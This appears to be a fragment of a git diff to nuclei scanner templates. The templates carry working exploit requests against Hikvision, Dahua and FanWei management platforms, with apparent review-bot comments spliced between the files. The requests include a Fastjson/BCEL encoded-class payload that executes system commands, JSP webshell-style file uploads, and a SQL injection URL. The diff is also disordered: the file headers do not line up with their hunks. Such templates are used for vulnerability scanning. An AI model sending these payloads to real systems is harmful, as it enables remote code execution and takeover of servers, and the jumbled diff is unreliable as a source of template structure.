"org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + Content-Type: image/jpeg + + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- + + - | + GET /eps/upload/{{name}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: name + json: + - ".data.resourceUuid" + internal: true matchers: - type: 
word words: - - "nt authority\\system" + - '{{randstr}}' diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 7f081b05e0..0ebd67934b 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml 
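Review bot: The new `info` block has three typos that will surface in every scan report: `name: HHIKVISION iVMS-8700 upload Webshell file` should be `name: HIKVISION iVMS-8700 upload Webshell file`, `author: zerZero Trust Security Attack and Defense Laboratory` should be `author: Zero Trust Security Attack and Defense Laboratory`, and `Platfor` in the description should be `Platform`. Both this file and poc/upload/Hikvision_iVMS-8700_upload_action.yaml keep the context line `id: HIKVISION`, so two different templates share one id; nuclei warns about duplicate template ids, so give each a distinct one (for example `hikvision-ivms-8700-upload`). The new content also carries no `reference` or `tags` line.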
@@ -1,48 +1,27 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + name: HIKVISION author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' - http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" - Content-Type: image/jpeg - - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - - - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: res_id - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - "nt authority\\system" diff --git a/poc/upload/dahua-wpms-addimgico-fileupload.yaml b/poc/upload/dahua-wpms-addimgico-fileupload.yaml index fa3aafbfe2..c7afb0444b 100644 --- a/poc/upload/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/upload/dahua-wpms-addimgico-fileupload.yaml 
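Review bot: The new template carries no `reference`, `tags` or `metadata.verified`/`max-request` entries, and the multi-kilobyte inline `$$BCEL$$` value in the JSON body has no comment stating where it came from, so a maintainer cannot attribute the finding or vet what the template sends. Add a `reference:` pointing at the advisory, at least `tags: hikvision,rce`, and a one-line comment above the `raw:` block noting the payload's source. The filename Hikvision_iVMS-8700_upload_action.yaml still describes a file-upload check while the content is now a command-execution probe, and the description's "command execution" claim sits next to an unchanged `severity: high`; align name, id and severity with the new content.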
@@ -1,68 +1,50 @@ id: CVE-2023-3836 info: - name: Dahua Smart Park Management - Arbitrary File Upload - author: HuTa0 - severity: critical + name: 大华-WPMS-upload-addimgico + author: hufei + severity: high description: | - Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. - remediation: | - Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. + 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 reference: - - https://github.com/qiuhuihk/cve/blob/main/upload.md - - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - - https://vuldb.com/?ctiid.235162 - - https://vuldb.com/?id.235162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-3836 - cwe-id: CWE-434 - epss-score: 0.03083 - epss-percentile: 0.8997 - cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* + https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E metadata: + max-request: 1 + fofa-query: app="大华-智慧园区综合管理平台" + hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true - max-request: 2 - vendor: dahuasecurity - product: smart_parking_management - shodan-query: html:"/WPMS/asset" - zoomeye-query: /WPMS/asset - tags: cve,cve2023,dahua,fileupload,intrusive,rce -variables: - random_str: "{{rand_base(6)}}" - match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 - Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} + User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 177 + 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" - Content-Type: application/octet-stream - Content-Transfer-Encoding: binary + --e00b34d08d13639f8b619829b04c1a29 + Content-Disposition: form-data; name="upload"; filename="test.jsp" + Content-Type: image/gif + + {{randstr}} + --e00b34d08d13639f8b619829b04c1a29-- - {{match_str}} - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 + GET /upload/emap/society_new/{{name}} HTTP/1.1 Host: {{Hostname}} - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 200" - - "contains(body_2, '{{match_str}}')" - condition: and - extractors: - - type: regex - name: shell_filename + - type: json + name: name + json: + - ".data" internal: true - part: body_1 - regex: - - 'ico_res_(\w+)_on\.jsp' -# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + matchers: + - type: word + words: + - '{{randstr}}' \ No newline at end of file diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index 8c93d2bd55..4e7ede529c 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml 
@@ -1,39 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate Connection: 